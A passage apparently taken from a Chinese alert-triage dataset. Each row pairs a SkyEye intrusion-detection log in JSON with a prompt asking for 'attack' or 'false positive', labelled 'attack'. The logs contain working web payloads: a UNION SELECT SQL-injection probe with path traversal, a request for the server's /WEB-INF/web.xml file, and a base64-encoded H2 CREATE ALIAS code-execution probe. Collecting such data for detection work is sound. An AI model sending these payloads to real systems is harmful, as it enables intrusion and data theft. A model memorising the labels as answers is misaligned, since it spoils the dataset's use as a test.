"h_proto_version": "HTTP/1.1", "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001483", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入攻击", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击:\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "103", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9pV2ViT2ZmaWNlU2lnbi9PZmZpY2VTZXJ2ZXIuanNwLy4uLy4uL3B1YmxpYy9pU2lnbmF0dXJlSFRNTC5qc3AvRG9jdW1lbnRFZGl0LmpzcD9Eb2N1bWVudElEPTElMjclMjB1bmlvbiUyMHNlbGVjdCUyMChzZWxlY3QrbWQ1KCUyNzgzOTQ4MTc2NCUyNykpLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwtLSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_962ec0c610d9aa7921b8fe65257eebbb", "access_time": "2024-11-27 14:15:59", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "src_mac": "00:94:a1:5e:6e:87", "file_name": "DocumentEdit.jsp", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440707-SQL注入攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12127", "h_url": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688159", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688159, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--", "dport": 30001, "vuln_name": "SQL注入攻击(机器学习)", "rsp_status": 0, "code_language": "", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 0, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2020-11-25 19:52:52", "sport": 12127}, "detail_info": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "71ccacd67320f2729d33d1d79ce0cd95", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "documentid": "1' union select (select+md5('839481764')),null,null,null,null,null,null,null,null,null,null--", "first_access_time": "2024-11-27 14:15:59", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "efbace0eafbf2e5a2781c945546f4ebc", "xff": "", "vuln_desc": "SQL注入攻击(机器学习)\r\nSQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688140", "code_language": "", "public_date": "2020-11-25 19:52:52", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b69", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入攻击(机器学习)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9pV2ViT2ZmaWNlU2lnbi9PZmZpY2VTZXJ2ZXIuanNwLy4uLy4uL3B1YmxpYy9pU2lnbmF0dXJlSFRNTC5qc3AvRG9jdW1lbnRFZGl0LmpzcD9Eb2N1bWVudElEPTElMjclMjB1bmlvbiUyMHNlbGVjdCUyMChzZWxlY3QrbWQ1KCUyNzgzOTQ4MTc2NCUyNykpLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwtLSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a20155a2ceb590a9587b7f2918bd70cd", "access_time": "2024-11-27 14:15:59", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "src_mac": "00:94:a1:5e:6e:87", "file_name": "DocumentEdit.jsp", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569449-SQL注入攻击(机器学习)", "rule_labels": "{}", "sport": "12127", "h_url": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688159", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732688159, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 414, "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--", "dport": 30001, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 394, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "223.160.174.104", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 12127}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "71ccacd67320f2729d33d1d79ce0cd95", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "documentid": "1' union select (select+md5('839481764')),null,null,null,null,null,null,null,null,null,null--", "first_access_time": "2024-11-27 14:15:59", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "4a381433886e37721b3ade444f084734", "xff": "", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "attack_chain": "0x02010000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688138", "code_language": "通用", "public_date": "2018-08-16 18:57:22", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "414", "h_proto_version": "HTTP/1.1", "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055d", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "394", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9pV2ViT2ZmaWNlU2lnbi9PZmZpY2VTZXJ2ZXIuanNwLy4uLy4uL3B1YmxpYy9pU2lnbmF0dXJlSFRNTC5qc3AvRG9jdW1lbnRFZGl0LmpzcD9Eb2N1bWVudElEPTElMjclMjB1bmlvbiUyMHNlbGVjdCUyMChzZWxlY3QrbWQ1KCUyNzgzOTQ4MTc2NCUyNykpLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwtLSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_6f6f5c2912b7e05e83a2f4d2ff8ee254", "access_time": "2024-11-27 14:15:59", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "src_mac": "00:94:a1:5e:6e:87", "file_name": "DocumentEdit.jsp", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12127", "h_url": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20(select+md5(%27839481764%27)),null,null,null,null,null,null,null,null,null,null--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688147", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732688147, "vuln_harm": "服务器敏感信息一旦泄露会导致攻击者获得重要信息,增加攻击成功率。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml", "dport": 30001, "vuln_name": "敏感信息扫描(机器学习)", "rsp_status": 0, "code_language": "", "solution": "请确认服务器是否存在相关文件,如果存在,可考虑迁移或删除敏感信息文件。", "hit_start": 0, "detail_info": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "public_date": "2020-11-25 19:44:12", "sport": 12152}, "detail_info": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "file_md5": "23f458c91b775c3d479131e3a31e8c29", "rule_key": "webids", "api": "218.76.15.56:30001/weaver/org.springframework.web.servlet.ResourceServlet", "first_access_time": "2024-11-27 14:15:47", "hazard_level": "2", "hazard_rating": "低危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "敏感信息扫描(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "bfc59eb6840e781dd54041602c829174", "xff": "", "vuln_desc": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "attack_chain": "0x01010000", "vuln_harm": "服务器敏感信息一旦泄露会导致攻击者获得重要信息,增加攻击成功率。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688128", "code_language": "", "public_date": "2020-11-25 19:44:12", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6a", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "敏感信息扫描(机器学习)", "attack_type": "敏感信息/重要文件泄漏", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请确认服务器是否存在相关文件,如果存在,可考虑迁移或删除敏感信息文件。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC93ZWF2ZXIvb3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5SZXNvdXJjZVNlcnZsZXQ/cmVzb3VyY2U9L1dFQi1JTkYvd2ViLnhtbCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "resource": "/WEB-INF/web.xml", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_8d88d1ce8c6b7cf2b5cd3c09cc5629d3", "access_time": "2024-11-27 14:15:47", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/weaver/org.springframework.web.servlet.ResourceServlet", "src_mac": "00:94:a1:5e:6e:87", "file_name": "org.springframework.web.servlet.ResourceServlet", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569450-敏感信息扫描(机器学习)", "rule_labels": "{}", "sport": "12152", "h_url": "/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688146", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "代码执行", "_origin": {"write_date": 1732688146, "vuln_harm": "典型的java代码执行如:Struts2框架的漏洞、Java反序列化漏洞。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "", "hit_end": 0, "uri": "/messageType.do", "dport": 30001, "vuln_name": "Java代码执行攻击(机器学习)", "rsp_status": 0, "code_language": "Java", "solution": "1,开发中要对关键函数要谨慎使用。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在java攻击或扫描代码。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "通过机器学习方式,检测到访问中存在java攻击或扫描代码。", "public_date": "2020-11-25 19:32:45", "sport": 12143}, "detail_info": "通过机器学习方式,检测到访问中存在java攻击或扫描代码。", "file_md5": "06846f571628dcbf4ae85a87ffe6abce", "rule_key": "webids", "api": "218.76.15.56:30001/messageType.do", "first_access_time": "2024-11-27 14:15:46", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Java代码执行攻击(机器学习)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "7233c7723d7fde8f3309a18712a224ae", "xff": "", "vuln_desc": "通过机器学习方式,检测到访问中存在java攻击或扫描代码。", "attack_chain": "0x02020000", "vuln_harm": "典型的java代码执行如:Struts2框架的漏洞、Java反序列化漏洞。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688126", "code_language": "Java", "public_date": "2020-11-25 19:32:45", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/messageType.do", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b65", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "Java代码执行攻击(机器学习)", "attack_type": "代码执行", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1,开发中要对关键函数要谨慎使用。\r\n2,避免未经检查的输入数据进入代码逻辑。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvbWVzc2FnZVR5cGUuZG8gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpDb250ZW50LUxlbmd0aDogMTEzDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "bWV0aG9kPWNyZWF0ZSZ0eXBlTmFtZT0xJztDUkVBVEUlMjBBTElBUyUyMHNsZWVwMjIyJTIwRk9SJTIwImphdmEubGFuZy5UaHJlYWQuc2xlZXAiO0NBTEwlMjBzbGVlcDIyMigwKTtzZWxlY3QrJzE=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", 